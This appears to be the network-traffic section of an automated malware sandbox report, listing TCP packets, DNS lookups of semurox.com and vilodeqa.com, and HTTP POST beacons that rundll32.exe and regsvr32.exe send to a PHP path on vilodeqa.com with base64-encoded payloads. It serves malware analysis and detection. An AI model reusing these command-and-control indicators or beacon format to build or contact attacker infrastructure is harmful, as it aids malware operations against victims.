                    Oct 6, 2024 13:25:17.937410116 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.937438965 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.937506914 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.937601089 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.937663078 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.944117069 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.944163084 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.944236994 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.944236994 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.944261074 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.944371939 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.944608927 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.944655895 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.944675922 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.944684982 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.944715977 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.944751024 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.944933891 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.944976091 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.944996119 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.945003986 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.945043087 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.945043087 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.945342064 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.945399046 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.945453882 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.945453882 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.945461988 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.945571899 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:17.945643902 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:17.945713043 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.060853004 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.060873985 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.060895920 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061007977 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061017036 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061049938 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061101913 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061111927 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061146975 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061153889 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061194897 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061201096 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061213970 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061227083 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061264992 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061269045 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061284065 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061294079 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061328888 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061331034 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061355114 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061362982 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061393023 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061404943 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061404943 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061418056 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061463118 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061463118 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061466932 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061487913 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061542034 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061542988 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.061543941 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061567068 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.061630964 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.067517996 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.067559958 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.067603111 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.067611933 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.067625999 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.068052053 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.068114042 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.068133116 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.068141937 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.068176031 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.068208933 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.082072020 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.082118034 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.082187891 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.082199097 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.082218885 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.084863901 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.117863894 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.117912054 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.117945910 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.117963076 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.117995024 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.118021965 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.118443966 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.118488073 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.118515015 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.118521929 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.118562937 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.118562937 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.118990898 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.119039059 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.119074106 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.119081020 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.119119883 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.119119883 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.119127035 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.119195938 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.119240046 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.119296074 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.147394896 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.147897005 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.271395922 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.279906988 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.279936075 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.279947996 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.280035973 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.280044079 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.280054092 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.280118942 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.280123949 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.280203104 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.280203104 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.280210018 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.280240059 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.280251026 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.280335903 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.280335903 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.280343056 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.280354977 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.280365944 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.280441999 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.280448914 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.280519962 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.280524015 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.280539989 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.280544043 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.280603886 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.315443039 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.491404057 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.491610050 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.578061104 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.578088045 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.578115940 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.578151941 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.578166962 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.578201056 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.736501932 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.736521959 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.736536980 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.736603975 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.736608982 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.736618996 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.736763954 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.736773014 CEST44349702193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.736856937 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.743396044 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.743418932 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.743484974 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.743546009 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:18.743577957 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.743599892 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.798662901 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.880775928 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:18.904170990 CEST49702443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.015034914 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.015055895 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.015152931 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.015153885 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.015186071 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.015202045 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.015357018 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.016035080 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.016052961 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.016136885 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.016136885 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.016149044 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.016330004 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.016347885 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.016381979 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.016391039 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.016411066 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.016510963 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.122554064 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.122577906 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.122665882 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.122688055 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.122725010 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.122836113 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.124116898 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.124135971 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.124197960 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.124211073 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.124257088 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.124371052 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.126477957 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.126493931 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.126764059 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.126777887 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.126873970 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.294426918 CEST49701443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.294467926 CEST44349701193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.375685930 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.375708103 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.375889063 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.375948906 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.376025915 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.376045942 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.376130104 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.376131058 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.376153946 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.376483917 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.376677990 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.376696110 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.376849890 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.376866102 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.377176046 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.377196074 CEST44349710193.109.85.31192.168.2.7
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Oct 6, 2024 13:25:10.936573982 CEST | 51480 | 53 | 192.168.2.7 | 1.1.1.1
                    Oct 6, 2024 13:25:11.295232058 CEST | 53 | 51480 | 1.1.1.1 | 192.168.2.7
                    Oct 6, 2024 13:25:13.957376957 CEST | 50514 | 53 | 192.168.2.7 | 1.1.1.1
                    Oct 6, 2024 13:25:14.932564020 CEST | 53 | 50514 | 1.1.1.1 | 192.168.2.7
                    Oct 6, 2024 13:25:25.957655907 CEST | 58371 | 53 | 192.168.2.7 | 1.1.1.1
                    Oct 6, 2024 13:25:26.475598097 CEST | 53 | 58371 | 1.1.1.1 | 192.168.2.7
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Oct 6, 2024 13:25:10.936573982 CEST | 192.168.2.7 | 1.1.1.1 | 0x2290 | Standard query (0) | semurox.com | A (IP address) | IN (0x0001) | false
                    Oct 6, 2024 13:25:13.957376957 CEST | 192.168.2.7 | 1.1.1.1 | 0xb8a2 | Standard query (0) | vilodeqa.com | A (IP address) | IN (0x0001) | false
                    Oct 6, 2024 13:25:25.957655907 CEST | 192.168.2.7 | 1.1.1.1 | 0x3a36 | Standard query (0) | vilodeqa.com | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Oct 6, 2024 13:25:11.295232058 CEST | 1.1.1.1 | 192.168.2.7 | 0x2290 | No error (0) | semurox.com | | 193.109.85.27 | A (IP address) | IN (0x0001) | false
                    Oct 6, 2024 13:25:14.932564020 CEST | 1.1.1.1 | 192.168.2.7 | 0xb8a2 | No error (0) | vilodeqa.com | | 193.109.85.31 | A (IP address) | IN (0x0001) | false
                    Oct 6, 2024 13:25:26.475598097 CEST | 1.1.1.1 | 192.168.2.7 | 0x3a36 | No error (0) | vilodeqa.com | | 193.109.85.31 | A (IP address) | IN (0x0001) | false
                    • semurox.com
                    • vilodeqa.com
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.7 | 49763 | 193.109.85.31 | 54801 | 7404 | C:\Windows\SysWOW64\rundll32.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Oct 6, 2024 13:25:26.498346090 CEST | 784 | OUT | POST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 581
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Data Ascii: data=eyJBbldGaCI6IjBsenhyd094NDR1NytIU2s0OXc9IiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsIkhkVlFwQSI6InozYlN2Q3VOM3FxUyIsIlFGWnlpaVVYWSI6InVEQ096M1hQIiwiUmJvdCI6IjJVL2x0Z3V0K0pxdSIsIlNiWlduWCI6InZqU0d6WDdMIiwiWWtKVyI6WyIxR0hjIl0sImNmS1giOiJ1Zz09IiwiaE5vdkptIjoieDI3RG1DRFg1ZWJlNkZENzFyZjI5U2hDY3lvUDJRa0wvZEhocHNwVW5jQVp3KzBGa1I0PSIsIm9CdU1VdSI6IjZITFlremliMHJ5ViIsInN0dVkiOiJ0akdPekE9PSIsInZvSmMiOiIrRy85bmc9PSIsIndBY0giOiJ5R25abkNETW1mL1FteEc1Iiwid1FlUkgiOiJ1RFNYdnlXTCIsInhlQ2NqUyI6InoyVGFsQ0k9IiwieWlpVVhZIjoielRycnFpV1IwNkNKMkdQYXl1ejE5MVpHWnpVdCtVZFpwNDNpdEtRUjE0cz0ifQ==
                    Oct 6, 2024 13:25:27.297554970 CEST | 218 | IN | HTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:27 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.7 | 49765 | 193.109.85.31 | 54801 | 7520 | C:\Windows\SysWOW64\rundll32.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Oct 6, 2024 13:25:26.511256933 CEST | 784 | OUT | POST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 581
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Oct 6, 2024 13:25:27.328933001 CEST | 218 | IN | HTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:27 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.7 | 49771 | 193.109.85.31 | 54801 | 7404 | C:\Windows\SysWOW64\rundll32.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Oct 6, 2024 13:25:27.339428902 CEST | 452 | OUT | POST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 249
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Data Ascii: data=eyJDS3oiOiJ5SFhsIiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsInZZdEIiOiI3VXYwIiwidm9KYyI6IitHLzluZz09Iiwid0FjSCI6InlHblpuQ0RNbWYvUW14RzUiLCJ4ZUNjalMiOiJ6MlRhbENJPSIsInlpaVVYWSI6InpUcnJxaVdSMDZDSjJHUGF5dXoxOTFaR1p6VXQrVWRacDQzaXRLUVIxNHM9In0=
                    Oct 6, 2024 13:25:28.155972958 CEST | 218 | IN | HTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:27 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    3 | 192.168.2.7 | 49772 | 193.109.85.31 | 54801 | 7520 | C:\Windows\SysWOW64\rundll32.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Oct 6, 2024 13:25:27.370230913 CEST | 452 | OUT | POST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 249
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Data Ascii: data=eyJDS3oiOiJ5SFhsIiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsInZZdEIiOiI3VXYwIiwidm9KYyI6IitHLzluZz09Iiwid0FjSCI6InlHblpuQ0RNbWYvUW14RzUiLCJ4ZUNjalMiOiJ6MlRhbENJPSIsInlpaVVYWSI6InpUcnJxaVdSMDZDSjJHUGF5dXoxOTFaR1p6VXQrVWRacDQzaXRLUVIxNHM9In0=
                    Oct 6, 2024 13:25:28.200218916 CEST | 218 | IN | HTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:27 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    4 | 192.168.2.7 | 49808 | 193.109.85.31 | 54801 | 7984 | C:\Windows\SysWOW64\regsvr32.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Oct 6, 2024 13:25:32.469784021 CEST | 784 | OUT | POST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 581
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Oct 6, 2024 13:25:33.300898075 CEST | 218 | IN | HTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:33 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    5 | 192.168.2.7 | 49816 | 193.109.85.31 | 54801 | 7984 | C:\Windows\SysWOW64\regsvr32.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Oct 6, 2024 13:25:33.342725039 CEST | 452 | OUT | POST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 249
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Data Ascii: data=eyJDS3oiOiJ5SFhsIiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsInZZdEIiOiI3VXYwIiwidm9KYyI6IitHLzluZz09Iiwid0FjSCI6InlHblpuQ0RNbWYvUW14RzUiLCJ4ZUNjalMiOiIyM1BTanc9PSIsInlpaVVYWSI6InpUcnJxaVdSMDZDSjJHUGF5dXoxOTFaR1p6VXQ2VTVPdlpQaXRLUVIxNHM9In0=
                    Oct 6, 2024 13:25:34.194962025 CEST | 218 | IN | HTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:33 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    6 | 192.168.2.7 | 49992 | 193.109.85.31 | 54801 | 7404 | C:\Windows\SysWOW64\rundll32.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Oct 6, 2024 13:27:38.336946964 CEST | 452 | OUT | POST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 249
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
